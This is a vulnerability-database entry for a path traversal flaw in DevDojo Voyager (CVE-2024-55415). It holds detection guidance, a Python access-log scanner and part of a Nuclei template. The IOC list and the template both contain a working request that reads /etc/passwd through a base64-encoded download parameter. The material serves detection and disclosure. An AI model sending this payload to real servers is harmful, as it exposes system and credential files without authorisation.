CVE-2024-55415
Published 2025-01-30
CVE-2024-55415: DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
Priority P3 · 45 · medium · 5.7 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 14.59% (96.2th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tcg | voyager | 0 – 1.8.0 | — |
| thecontrolgroup | voyager | <= 1.8.0 | — |
Detection & IOCs
- url: /admin/compass?download={{base64('/etc/passwd')}}
- other: regex('root:.*:0:0:', body)
- Detect path traversal attempts against the /admin/compass endpoint by monitoring for base64-encoded path strings in the 'download' query parameter.
- Successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' in the response body, indicating /etc/passwd was read.
- The path traversal flaw enables attackers to manipulate file paths and delete or access arbitrary files on the server.
- Monitor for HTTP 302 redirects from /admin/compass as an intermediate indicator during exploitation attempts.
- Exploitation requires an authenticated Voyager admin session; the attacker must trick an authenticated user into clicking a malicious link (one-click attack vector).
- All versions through 1.8.0 are affected and no official patch exists; detections should cover all Voyager deployments up to and including 1.8.0.
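The monitoring described in the list above can be run over web-server access logs. The following is an added example, not code from this page, Voyager or the Nuclei template: it decodes the `download` parameter on `/admin/compass` requests and reports the decoded path with the response status. It assumes common/combined log format; the `is_suspicious` heuristic and the benign `laravel.log` sample are assumptions, and all log lines are constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Request line and status as they appear in common/combined access-log format.
REQ = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_download(value):
    """Base64-decode a 'download' value; return None when it is not valid base64."""
    value = value.replace(" ", "+")       # parse_qs turns a literal '+' into a space
    value += "=" * (-len(value) % 4)      # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def is_suspicious(path):
    """Assumed heuristic: absolute paths or '..' segments are not expected here."""
    return path.startswith("/") or ".." in path.replace("\\", "/").split("/")

def scan(lines):
    """Return (status, decoded_path, verdict) per flagged /admin/compass request.

    200 means a file body was served, 302 is the intermediate indicator,
    any other status is recorded as an attempt.
    """
    hits = []
    for line in lines:
        m = REQ.search(line)
        if m is None:
            continue
        url = urlsplit(m["target"])
        if url.path.rstrip("/") != "/admin/compass":
            continue
        status = int(m["status"])
        for raw in parse_qs(url.query).get("download", []):
            path = decode_download(raw)
            if path is None or not is_suspicious(path):
                continue
            verdict = {200: "file-served", 302: "redirect"}.get(status, "attempt")
            hits.append((status, path, verdict))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2025:10:00:01 +0000] "GET /admin/compass?download=L2V0Yy9wYXNzd2Q%3D HTTP/1.1" 200 1843',
    '192.0.2.10 - - [30/Jan/2025:10:00:00 +0000] "GET /admin/compass?download=L2V0Yy9wYXNzd2Q HTTP/1.1" 302 0',
    '198.51.100.7 - - [30/Jan/2025:10:05:00 +0000] "GET /admin/compass?download=bGFyYXZlbC5sb2c= HTTP/1.1" 200 5120',
]
if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs do not record response bodies, so a `file-served` verdict should be confirmed against the `root:.*:0:0:` body match where response capture is available.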
OSV
DevDojo Voyager vulnerable to path traversal
osv·2025-01-30
CVE-2024-55415 [HIGH] DevDojo Voyager vulnerable to path traversal
GHSA
DevDojo Voyager vulnerable to path traversal
ghsa·2025-01-30
CVE-2024-55415 [HIGH] CWE-22 DevDojo Voyager vulnerable to path traversal
No detection rules found.
Nuclei
DevDojo Voyager <=1.8.0 - Arbitrary File Read
nuclei·CVSS 5.7
CVE-2024-55415 [MEDIUM] DevDojo Voyager <=1.8.0 - Arbitrary File Read
DevDojo Voyager ')"

```yaml
          - "status_code == 302"
        condition: and
        internal: true
  - raw:
      - |
        GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4b0a004830460221009e4950617c15d4de703b9324b609271a1a1ec05ff401ff88797cb3e63fe87a15022100c3aeaa4fe956e5c9eae98b98c636463cccc85a8916e7a14ecd66d5a377f8bfb2:922c64590222798bb761d5b6d8e72950
```
Published: 2025-01-30